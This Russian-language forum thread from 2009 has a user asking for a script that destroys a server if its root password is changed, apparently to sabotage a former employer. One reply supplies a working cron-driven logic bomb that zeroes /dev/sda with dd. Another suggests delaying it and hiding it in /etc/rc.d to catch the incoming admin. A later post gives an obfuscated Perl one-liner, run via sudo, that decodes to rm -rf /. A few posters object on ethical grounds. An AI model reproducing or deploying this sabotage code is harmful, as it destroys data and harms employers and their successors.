Страница 1 из 1
Нужен убийственнный скип
Добавлено: 2009-07-31 20:39:00
Sky
Нужен убийственнный скипт который при смене рутового пароля гробит систему совсем вплоть до форматирования дисков.....
Знатоки шелла поможите плиз.....
Re: Нужен убийственнный скип
Добавлено: 2009-07-31 22:31:11
goshanecr
Да тут не надо вроде быть прямо знатоком шелла
1. Дай своему root'у какой нибудь уникальный User Comment (чтобы его хеш пароля можно было выделиьт однозначно из списка других логинов)
2. Теперь узнаём md5 текущего хеша (md5 нужен чтобы не было проблем с всякими спецсимволами из хеша в дальнейшем) и сохраняем полученный хеш в
/root/.truepass
Код: Выделить всё
md5 -qs `cat /etc/master.passwd | grep root | grep NEW_COMMENT | awk -F : '{print $2}'` > /root/.truepass
3. Теперь собственно сам скрипт который запускаешь cron'ом каждую минуту
Код: Выделить всё
#!/bin/sh
#Получаем текущий хеш
HASH=`cat /etc/master.passwd | grep root | grep NEW_COMMENT | awk -F : '{print $2}'`
CURHASH=`md5 -qs ${HASH}`
#Сравниваем с текущим
cat /root/.truepass | grep ${CURHASH}
#Если не идентичные то рубим всё к чертям самыми разными способами (предполагаем уничтожение диска /dev/sda):)
if [ "$?" -ne "0" ] ; then
dd if=/dev/zero of=/dev/sda bs=65535
fi
Написал от руки, сам не пробовал можно чуть поправить коли чего
Знаю что не программист я, так что не пинать
Re: Нужен убийственнный скип
Добавлено: 2009-08-03 9:15:27
schizoid
интересно, а накуя такие скрипты нужны?
Re: Нужен убийственнный скип
Добавлено: 2009-08-03 10:18:00
gonzo111
тогда еще проверку времени надо добавить чтоб ровно через 1.5 мес
когда всю зп отдадут и новый одмин начнет менять пароль
можно куда нибудь в /etc/rc.d забабахать
аж самому страшно потом приходить админить такой сервак если он еще и файловый и почтовый
будет глубокая благодарность неблагодарному начальству, конечно новый админ попадет под раздачу...
как правило жлобское руководство возмет человека на такую же зп как и была у прошлого админа в течении последних эдак 2 лет и квалификация его будет соответствующая и может кто-то из этих босов поймет, что на зп админа экономить не следует....
Re: Нужен убийственнный скип
Добавлено: 2009-08-03 10:41:01
goshanecr
Смотри как бы сам под раздачу не попал... Зачем следующему админу то гадить? Он в чём-то разве виноват? Я так понимаю можно себя обезопасить до выдачи всей ЗП каким-то образом по типу шифрование разделов на которых лежат данные и чтобы ты мог один их смонтировать, то бишь пока не выдадут ЗП нет доступа к данным. А уже в случае нормального увольнения (с выплатой всех долгов и исполнения всех договорённостей) отдаёшь все ключи, явки, пароли.. Просто так уничтожать всё если начальство со своей стороны исполнило обязательства, как то некрасиво.
Re: Нужен убийственнный скип
Добавлено: 2009-08-03 14:35:17
gonzo111
это все понятно, я ж не против если тебе(мне) все выплатили и все без проблем, то и незачем огурцы так мариновать
Re: Нужен убийственнный скип
Добавлено: 2009-08-04 9:12:41
Sky
Народ, спасибо за помощь..... Интересующимся отвечу - бывают ситуации когда обижают не админа а всю команду целиком. Люди снимаются и уходят делать бизнес в другом месте, а вот дарить наработанное очень не хочется. Поэтому и возникают такие вопросы.
С другой стороны, загубить 10 лет труда рука не поднимается.... пусть это сделает железный паровоз с подачи новой команды....
Re: Нужен убийственнный скип
Добавлено: 2009-08-04 9:39:47
terminus
Не, ИМХО так делать неправельно. Результаты труда уже с тобой - в голове и опыте, а вот рушить сделанное своими руками только из-за каких-то говнотёрок с "манагерами" не стоит, и делать западло для следующего админа я бы тоже не стал...
Полностью передать сделанное, а потом пусть сами разбираются, если такие умные - это тоже в некотором роде вариант.
Re: Нужен убийственнный скип
Добавлено: 2009-08-04 14:34:18
Mefis
Код: Выделить всё
echo "test... test... test..." | sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}
<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Те же яйца, но в профиль:
Код: Выделить всё
$var = "=]=>%-{<-|}<&|`{";
$var = tr{ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}}
{`abcdefghijklmnopqrstuvwxyz{/" -};
eval($var);
То есть, сначала командой $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{; во временную переменную записывается текст =]=>%-{<-|}<&|`{, затем он транслитерируется (y; -/:-@[-`{-};`-{/" -;) и превращается в команду system"rm -rf /" .Далее эта команда отдается на исполнение интерпретатору (s;;$_;see). Скрипт использует ряд идиом Perl, усложняющих чтение исходного кода.
